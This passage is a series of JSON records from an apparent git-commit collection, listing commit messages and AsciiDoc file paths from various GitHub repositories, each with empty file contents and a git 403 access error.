trapdata\/elassandra,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/delete-snapshot.asciidoc","new_file":"docs\/en\/rest-api\/ml\/delete-snapshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"315e0d715cd61d081401446d26808da5471a3984","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ebd89b7bbac22b7893861b729173065b75d657","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a43b7e862af3832fbec1a50175295fb072684b","subject":"and link it here","message":"and link it here\n\nSigned-off-by: Ricky Elrod <3de8762d49a778edd8b1aa9f381ea5a9ccb62944@elrod.me>\n","repos":"noexc\/mapview,noexc\/mapview","old_file":"doc\/Introduction.adoc","new_file":"doc\/Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/noexc\/mapview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ae97c74ac22f3ee6dc2c0315ebb5f5e91364e7","subject":"Update 2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","message":"Update 2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","new_file":"_posts\/2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"029dc3f981c17daf3fe3acb62e3b765541d6500d","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"937456894fc55e53b302d01dff01ce4487d18a50","subject":"Update 2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","message":"Update 2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","new_file":"_posts\/2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58523761851893131352bf6e4ddf8e8495b17905","subject":"Update 2015-05-26-TEST.adoc","message":"Update 2015-05-26-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0289a8b787c1663cfde3d07de09bd341f80384","subject":"Update 2016-08-26-Test.adoc","message":"Update 2016-08-26-Test.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-26-Test.adoc","new_file":"_posts\/2016-08-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e913b5979400f79d5c62ab92580b46af3b7d4bf","subject":"CL note: merging pathname","message":"CL note: merging 
pathname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0af5cd9cd758057911e7f4f20d733e6e9d30b496","subject":"Update 2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","message":"Update 2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","new_file":"_posts\/2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78100abcb69d35253c9fbe00b776ede079e07bb9","subject":"y2b create post Who Makes The World's Best Wallet?","message":"y2b create post Who Makes The World's Best Wallet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-04-Who-Makes-The-Worlds-Best-Wallet.adoc","new_file":"_posts\/2017-06-04-Who-Makes-The-Worlds-Best-Wallet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb2a68762a8c71b5723b4aaff77b0ca44cd15acb","subject":"typo's","message":"typo's\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abf8a947d583e867b655fdff4720816887f32384","subject":"Update 2015-07-09-Markdown-test.adoc","message":"Update 2015-07-09-Markdown-test.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-09-Markdown-test.adoc","new_file":"_posts\/2015-07-09-Markdown-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"969bf992dfa5b8f5055761d8bc0d5c80c239e064","subject":"Update 2017-08-13-My-first-post.adoc","message":"Update 2017-08-13-My-first-post.adoc","repos":"karcot\/trial1,karcot\/trial1,karcot\/trial1,karcot\/trial1","old_file":"_posts\/2017-08-13-My-first-post.adoc","new_file":"_posts\/2017-08-13-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/karcot\/trial1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c95135f0b067e5b5f0827256f684cb303ac4855","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 
2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"235a97070c520f5d50aba2bc71f0cc8da0693b9f","subject":"Deleted _posts\/2016-11-3-you-know-what.adoc","message":"Deleted _posts\/2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-11-3-you-know-what.adoc","new_file":"_posts\/2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42dd417e6e338ba8b8816a5d554fdedb86754698","subject":"Update 2015-09-27-Reseau-de-neurones.adoc","message":"Update 2015-09-27-Reseau-de-neurones.adoc","repos":"Akanoa\/akanoa.github.io,Akanoa\/akanoa.github.io,Akanoa\/akanoa.github.io","old_file":"_posts\/2015-09-27-Reseau-de-neurones.adoc","new_file":"_posts\/2015-09-27-Reseau-de-neurones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Akanoa\/akanoa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8244d3a19ce3b9d9ff8e3f8dee4d71cdf3a90c18","subject":"Renamed '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Blog-Home.adoc'","message":"Renamed '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Blog-Home.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-Home.adoc","new_file":"_posts\/2018-01-09-Blog-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26ab52e5c494617009ae39a6b314d23c365cd303","subject":"Added news\/2017-02-03-forge-2.5.0.final.asciidoc","message":"Added news\/2017-02-03-forge-2.5.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-02-03-forge-2.5.0.final.asciidoc","new_file":"news\/2017-02-03-forge-2.5.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d01bb02a359b39bef35f8175a0bc95539968f4a","subject":"Added messages docs","message":"Added messages docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"991fe5eccd7fcfeae33125c80e867bc2fcfae600","subject":"Update 2015-07-22-Patrick-Fischer.adoc","message":"Update 2015-07-22-Patrick-Fischer.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-07-22-Patrick-Fischer.adoc","new_file":"_posts\/2015-07-22-Patrick-Fischer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a5a79a5b022e4f50b152ee294d692d51704a081","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcd6427875d76a2462354e7d4cce06531f6054cd","subject":"Added TODO.asciidoc to remember","message":"Added TODO.asciidoc to remember\n","repos":"cos-ht\/cataliner-framework","old_file":"TODO.asciidoc","new_file":"TODO.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cos-ht\/cataliner-framework.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ec24853e6626bd785df89a2fbf8b419ef2ad075","subject":"short documentation on how to request a cert from a Windows CA","message":"short documentation on how to request a cert from a Windows CA\n","repos":"Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,ato\/yubico-piv-tool,hirden\/yubico-piv-tool","old_file":"doc\/Windows-Certificate.asciidoc","new_file":"doc\/Windows-Certificate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4dae835cc4bacfb38dfedbf464daf5299e09eb29","subject":"Update 2017-07-26-Wednesday-July-26-2017.adoc","message":"Update 2017-07-26-Wednesday-July-26-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-26-Wednesday-July-26-2017.adoc","new_file":"_posts\/2017-07-26-Wednesday-July-26-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aa0c4f777f25fdc905beb42166d8d4b19b3bdad","subject":"Publish 2016-7-19-and.adoc","message":"Publish 
2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba9aace7e292738160db6326dd15571ae9fd9aa","subject":"Update 2017-03-24-Test-Math-Jax.adoc","message":"Update 2017-03-24-Test-Math-Jax.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-03-24-Test-Math-Jax.adoc","new_file":"_posts\/2017-03-24-Test-Math-Jax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"012c604a9bf41d4632cc75bf80cc2f36df6d7ba7","subject":"Update 2016-12-14-Primeiro-post.adoc","message":"Update 2016-12-14-Primeiro-post.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-Primeiro-post.adoc","new_file":"_posts\/2016-12-14-Primeiro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d63bacc53d9af1c4ebc3e31f5c410db631bc2384","subject":"Release Process doc draft - #78","message":"Release Process doc draft - #78\n","repos":"richwidgets\/richwidgets","old_file":"release-process.adoc","new_file":"release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/richwidgets\/richwidgets.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06d7564b9f18722d4cfcdf3432826761bfd24893","subject":"Update 2016-07-25-Nodejs.adoc","message":"Update 2016-07-25-Nodejs.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-07-25-Nodejs.adoc","new_file":"_posts\/2016-07-25-Nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1a781ce447361bd9bbc99331c3ed63079673e4b","subject":"Update 2018-03-28-nature.adoc","message":"Update 2018-03-28-nature.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-28-nature.adoc","new_file":"_posts\/2018-03-28-nature.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d026707fe4f5f1aa9132897c56aec1177e23a833","subject":"Publish 2017-02-25adocadoc-part-1.adoc","message":"Publish 
2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310274cd5020fa25c5e0ac88bc3dfb4963c979fd","subject":"update the API doc","message":"update the API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fa7d03034525f976ab133a49b23a1272ce256d5d","subject":"Added Asciidoc version of the man page ykpersonalize.1","message":"Added Asciidoc version of the man page ykpersonalize.1\n","repos":"Yubico\/yubikey-personalization,Yubico\/yubikey-personalization,eworm-de\/yubikey-personalization,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,Yubico\/yubikey-personalization-dpkg","old_file":"man\/ykpersonalize.1.adoc","new_file":"man\/ykpersonalize.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-personalization.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6cc1990e7f0b66858faa3801c85bba19bb3af68e","subject":"Update 2015-12-26-Post-Pertama-dengan-Hubpress.adoc","message":"Update 2015-12-26-Post-Pertama-dengan-Hubpress.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2015-12-26-Post-Pertama-dengan-Hubpress.adoc","new_file":"_posts\/2015-12-26-Post-Pertama-dengan-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"948b35462bc92922e4c9634b9fcba13749fb6ed7","subject":"Update 2016-04-15-A-quien-le-interese-Semana-3.adoc","message":"Update 2016-04-15-A-quien-le-interese-Semana-3.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-A-quien-le-interese-Semana-3.adoc","new_file":"_posts\/2016-04-15-A-quien-le-interese-Semana-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d3a667c8c6c03d93b4fc6be4e2e4d578f03cce1","subject":"Update 2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","message":"Update 2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","new_file":"_posts\/2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"823d09ca835576e1365714c6713a91f43515da27","subject":"CP view","message":"CP view\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Class path\/Overview.adoc","new_file":"Class path\/Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f0d892e044b5176752780cf859d4a94ac8ce26","subject":"Update 2015-07-18-My-summer-internship.adoc","message":"Update 2015-07-18-My-summer-internship.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-18-My-summer-internship.adoc","new_file":"_posts\/2015-07-18-My-summer-internship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f24f184d21679128d6017beaf5fd89f2d129469d","subject":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","message":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af6a025a5aa6523bd72fc6f6c1a4259b570d7c66","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b1caade8a2916af84f22094c9d1687170099c2","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7621a9b436a35fcd3d40df60d47a3b4700002030","subject":"Added changelog.","message":"Added changelog.\n","repos":"jeffrimko\/QuickWin,jeffrimko\/QuickWin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/QuickWin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4b866fa731492e5f699dd719e8d8d85c4f731cd1","subject":"Minor corrections in documentation","message":"Minor corrections in documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d51586f330e3e56b380e0aa767c4e2619b1f4024","subject":"No ex Predicate (advance use)","message":"No ex Predicate (advance use)\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc3af628922f605b69e0e73a1b7240e63b94e03","subject":"Update 2016-01-05-Personalized-Koder-MOTD.adoc","message":"Update 2016-01-05-Personalized-Koder-MOTD.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-01-05-Personalized-Koder-MOTD.adoc","new_file":"_posts\/2016-01-05-Personalized-Koder-MOTD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"011c101b7a7405c7b5242873f600e331a44dd3c8","subject":"Update 2016-05-01-First-try.adoc","message":"Update 2016-05-01-First-try.adoc","repos":"christofmarti\/blog,christofmarti\/blog,christofmarti\/blog,christofmarti\/blog","old_file":"_posts\/2016-05-01-First-try.adoc","new_file":"_posts\/2016-05-01-First-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christofmarti\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"584059dce8ff796a3152d72c67e81c834e1542f7","subject":"Update 2016-07-07-A-short-article-on-database-sanity.adoc","message":"Update 2016-07-07-A-short-article-on-database-sanity.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2016-07-07-A-short-article-on-database-sanity.adoc","new_file":"_posts\/2016-07-07-A-short-article-on-database-sanity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64b0096bb371821adf4f90d07c453639ad240a5d","subject":"Update 